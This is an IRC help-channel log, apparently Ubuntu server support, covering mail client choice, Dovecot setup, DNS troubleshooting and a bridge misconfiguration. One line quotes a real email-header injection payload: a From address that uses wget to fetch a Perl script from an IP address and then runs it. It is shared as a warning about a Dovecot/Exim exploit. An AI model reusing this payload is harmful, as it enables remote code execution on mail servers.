brad9001 | hello all, I just set up dovecot and I wanted to see what email client you guys would recommend because I dont like thunderbird | 00:39 |
---|---|---|
Pastafarian | matter of personal taste. | 00:41 |
Pastafarian | I've only used outlook and thunderbird. I stick to the latter. | 00:41 |
brad9001 | well I can never get thunderbird to work and it pisses me off because i love it for my gmail accounts | 00:41 |
brad9001 | Ill look into outlook though | 00:42 |
Pastafarian | in terms of more than a email client outlook is fantastic | 00:42 |
Pastafarian | but it's more suited to business work, meetings, calendar etc... | 00:42 |
Pastafarian | works fine as an email client | 00:43 |
brad9001 | oh, well what would you reccomend besides thunderbird? | 00:44 |
Pastafarian | besides outlook, no idea | 00:45 |
Pastafarian | never used anything | 00:45 |
Pastafarian | you might want to look into mailpile if you are interested in encryption | 00:45 |
brad9001 | ok will do thanks @pastafarian | 00:51 |
brad9001 | @pastafarian you there? would you mind helping me with dovecot-postfix setup? | 01:11 |
Pastafarian | Sorry, I haven't done dovecot before. | 01:15 |
Pastafarian | There are a few good guides knocking around on the ubuntu wiki somewhere. | 01:15 |
ScottK | The configuration in Ubuntu Server Guide (see /topic) works. | 01:17 |
Pastafarian | I am not entirely sure that the implementation there is secure | 01:17 |
Pastafarian | There was a recent dovecot exploit that worked and there was no imput sanitisation on dovecot when it got stuff passed from postfix | 01:18 |
Pastafarian | they could run arbitrary commands by embeding them into the headers of the email | 01:18 |
ScottK | Link? | 01:18 |
Pastafarian | reply to address I seem to remember | 01:18 |
Pastafarian | one second, it might not apply here, I need to find the link | 01:18 |
Pastafarian | I saw them try to do it on my mail server, but I am not using dovecot | 01:19 |
Pastafarian | the offending string itself was the from address | 01:22 |
Pastafarian | from=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}188.130.34.244/p``perl${IFS}/tmp/p.pl`@blaat.co$ | 01:22 |
ScottK | Interesting. | 01:24 |
ScottK | I don't think there's anything in the way one configures dovecot that would affect if it did input validation on the From address or not. | 01:24 |
Pastafarian | I remember the link saying it was the return path | 01:25 |
Pastafarian | that something when passed executed this | 01:26 |
Pastafarian | It might have been an EXIM dovecot config however | 01:26 |
=== peter is now known as Guest64994 | ||
Pastafarian | trying to find the original email as that is from my emails to the relevant abuse@ addresses | 01:26 |
=== freeflying is now known as freeflying_away | ||
=== LargePrime is now known as Guest94883 | ||
Pastafarian | ScottK, https://isc.sans.edu/diary/Dovecot++Exim+Exploit+Detects/16243 | 01:32 |
ScottK | Thanks. | 01:33 |
ScottK | Shouldn't be a problem with postfix/lmtp. | 01:33 |
Pastafarian | indeed | 01:33 |
Pastafarian | Rusty memory | 01:33 |
Pastafarian | that being said, they imply the default config for exim and dovecot is the cause | 01:33 |
Pastafarian | which is worrying | 01:33 |
Pastafarian | I reported that to 3 different businesses and got no replies from any of them. | 01:34 |
Pastafarian | all of them directly responsible for providing this hacker with services | 01:34 |
ScottK | I wonder if it had a CVE. | 01:36 |
Pastafarian | I don't think it did at the time but I cannot be sure about that | 01:36 |
Pastafarian | either way the logs are misleading | 01:37 |
Pastafarian | the email contained no From: | 01:37 |
Pastafarian | only the reply-to: | 01:37 |
Pastafarian | the headers themselves on that mail gave it away | 01:37 |
=== LargePrime_ is now known as LargePrime | ||
Pastafarian | ScottK, server guide doesnt cover courier which is surprising | 01:53 |
=== freeflying_away is now known as freeflying | ||
LargePrime | how tangential a discussion are we allowed hear? | 02:05 |
LargePrime | like i hear ovh is out of servers | 02:05 |
Pastafarian | is that even possible? | 02:05 |
LargePrime | and am looking for mor info | 02:05 |
Pastafarian | They're a hosting company | 02:06 |
Pastafarian | they'd just buy more servers | 02:06 |
LargePrime | It seems they have no servers? | 02:06 |
Pastafarian | seems unlikely | 02:06 |
LargePrime | intell stopped making the CPU they use | 02:06 |
Pastafarian | they'd just tide over using EC2 or something | 02:06 |
Pastafarian | LargePrime, that isn't going to stop them. | 02:06 |
LargePrime | well the sp packages are now at 72 hours till available | 02:06 |
Pastafarian | They'll just use a different CPU | 02:07 |
LargePrime | but i hear that after you order they are taking weeks to fill | 02:07 |
Pastafarian | seems unlikely for such a large company to have screwed it up that badly | 02:07 |
LargePrime | but all this is hearsay | 02:07 |
LargePrime | thats why i bug people like yous | 02:07 |
LargePrime | But the SP1's used to fill in 20 min flat | 02:07 |
LargePrime | and the web site now say 72 hours | 02:08 |
LargePrime | and there are a few web acounts of others not getting servers for weeks | 02:08 |
Pastafarian | well, it's not impossible for it to happen | 02:09 |
Pastafarian | but it's like hearing that amazon ec2 ran out of servers | 02:09 |
LargePrime | http://forum.ovh.co.uk/showthread.php?t=7176 | 02:11 |
Pastafarian | ha | 02:12 |
Pastafarian | every time I look at VPS's I cringe | 02:12 |
Pastafarian | so expensive | 02:12 |
Pastafarian | I have a geolocated octacore with 16gb of RAM for free | 02:12 |
Pastafarian | if I wanted something similar from a VPS host I am looking at 10k annually | 02:12 |
Pastafarian | Gotta love universities eh? | 02:13 |
=== freeflying is now known as freeflying_away | ||
Fire | Anyone can give me a hand with bind9 config im having issues with. | 10:04 |
Fire | Im probably just forgetting something really stupid. | 10:07 |
=== Burrnn is now known as Fire | ||
Fire | Anyone can give me a hand with bind9 issue - using Dig it resolves but when pointed to webserver it doesnt | 10:45 |
ikonia | when pointed at a webserver ? | 10:45 |
Fire | As in i pointed my domain name to my server with NS records; but it wotn resolve | 10:46 |
ikonia | you just said it resolved with dig | 10:46 |
Fire | when I ssh internally it resolves | 10:46 |
ikonia | Fire: is this domain name on the public internet | 10:46 |
Fire | yes | 10:46 |
ikonia | what is the domain name | 10:47 |
Fire | moddl.com | 10:47 |
ikonia | Name Server: KS200136.KIMSUFI.COM | 10:47 |
ikonia | Name Server: NS.KIMSUFI.COM | 10:47 |
ikonia | Name Server: NS11.OVH.NET | 10:47 |
ikonia | are they your name servers ? | 10:47 |
Fire | thats correct | 10:47 |
ikonia | Fire: what is the FQDN you are trying to resolve | 10:47 |
Fire | *.moddl.com. | 10:49 |
ikonia | can you give me a valid host | 10:49 |
ikonia | eg: test01.moddl.com | 10:49 |
ikonia | when did you update these records ? | 10:50 |
Fire | few hours ago - was trying to get just moddl.com. to work first then ill fiddle with subdomains | 10:50 |
ikonia | ok, so it's probably not propogated yet | 10:50 |
ikonia | as my dns server is showing no records | 10:50 |
Fire | never had the issue before | 10:50 |
ikonia | I can't get a response from ns.kimsufi.com | 10:52 |
sgran | Fire: when I ask your nameservers directly, none of them respond with an soa record | 10:52 |
Fire | hmm | 10:52 |
Fire | its first time ive tried to setup dns on a kimsufi/ovh | 10:52 |
ikonia | Fire: it's showing they are not soa | 10:52 |
ikonia | and I can't do recursion, so it rejects me | 10:53 |
sgran | ns.kimsufi.com and ns11.ovh.net give me 'recursion requested but not available' and ks200136.kimsufi.com does not answer | 10:53 |
ikonia | sgran: confirmed | 10:53 |
sgran | I'd suggest that you have not configured them to be authoritative for the domain? | 10:53 |
ikonia | seems the logical conclusion | 10:54 |
Fire | let me check | 10:54 |
Fire | am pretty sure i did | 10:54 |
Fire | 38200755 | 10:59 |
Fire | moddl.com. IN SOA ns1.moddl.com. admin.moddl.com. ( | 10:59 |
Fire | any other ideas | 11:07 |
Fire | Im thinking about just changing the records at the registrar | 11:07 |
Fire | sgran any other ideas | 11:33 |
sgran | Fire: the .com registrar says that moddl.com is served by kimsufi/ovh | 11:34 |
Fire | It is | 11:34 |
sgran | I think the simplest is going to be letting kisufi/ovh know about this | 11:34 |
Fire | Kimsufi support are beyond useless | 11:34 |
sgran | hmm. This begs the question - why are you using them? :) | 11:36 |
Fire | Cheap :) | 11:37 |
Fire | Ridicuolously so in fact | 11:37 |
sgran | I might be seeing why | 11:38 |
Fire | I used 2 kimsufis in the past as seedboxes - if you are peering mostly to europe / canada its crazy good value | 11:38 |
sgran | in fact, I'm going to set up a new business | 11:38 |
sgran | pay me £5/year, and I'll pretend to host DNS for you | 11:38 |
sgran | of course, I won't actually do anything but collect your money | 11:39 |
sgran | but it will be cheap :) | 11:39 |
Fire | To put it in perspective i transferred ~25TB in a month. | 11:39 |
Fire | which for £6.30 for 2 servers is quite good value | 11:39 |
Fire | For my business i use elsewhere - but I dont really wanna spend £60/month for a personal server for tinkering | 11:41 |
Nox_404 | Hi, i made a mistake, on an ubuntu server 12.04 i create a bridge between eth0 and another bridge (i wrote the wrong iface) so now i can't reconnect this server ! (using ssh). If i reboot the server will my connection be back ? | 13:12 |
Nox_404 | please answer me | 13:14 |
bekks | Nox_404: Do you have any other chance other than rebooting now? | 13:15 |
Nox_404 | bekks: thats a remote server and i don't have any other way to connect this server | 13:16 |
bekks | Then you have no other option left. | 13:17 |
bekks | So it doesnt matter what we tell you, you have to reboot. | 13:17 |
Nox_404 | bekks: ok so i'll try that | 13:18 |
Nox_404 | bekks: thanks | 13:18 |
bekks | Thank yourself ;) | 13:18 |
patdk-lap | how would we know if a reboot would help? | 13:24 |
patdk-lap | you lacked to tell us how to did it, what files you modified. | 13:25 |
bekks | There is no other chance than rebooting. | 13:25 |
Nox_404 | patdk-lap: I used `brctl addif iface iface` | 13:26 |
bekks | Nox_404: So did you reboot it? | 13:28 |
Nox_404 | bekks: I have to wait for a friend to reboot it, like i said i don't have access to this server | 13:29 |
Nox_404 | bekks: I must wait for tonight .... | 13:29 |
bekks | Nox_404: Does your friend have physical access? | 13:29 |
Nox_404 | bekks: yes | 13:29 |
bekks | So there even is a way to fix it if rebooting doesnt help. | 13:30 |
bekks | You should have told us about those details. | 13:30 |
Nox_404 | bekks: but he doesn't know anything about ubuntu.. | 13:30 |
bekks | You can tell him what he needs to do. | 13:30 |
bekks | You can screw his server, you can tell him to reboot it - so you can tell him what to do. :) | 13:30 |
Nox_404 | i just wanted to know if rebooting is enouth to fix it | 13:31 |
bekks | we dont know. | 13:31 |
=== freeflying is now known as freeflying_away | ||
plasmen | hello | 17:53 |
plasmen | can you help me with something | 17:53 |
plasmen | I am missing the 250-AUTH LOGIN PLAIN and 250-AUTH=LOGIN PLAIN | 17:53 |
plasmen | any ideas? | 17:54 |
Nox_404 | bekks: My friend reboot it and it works fine, brctl doesn't keep the configuration after a reboot | 18:40 |
=== dr0pix is now known as RogerThat | ||
=== RogerThat is now known as dr0pix | ||
=== Firartix is now known as Fira | ||
=== lifeless_ is now known as lifeless | ||
=== freeflying is now known as freeflying_away | ||
=== freeflying_away is now known as freeflying | ||
=== freeflying is now known as freeflying_away |
Generated by irclog2html.py 2.7 by Marius Gedminas - find it at mg.pov.lt!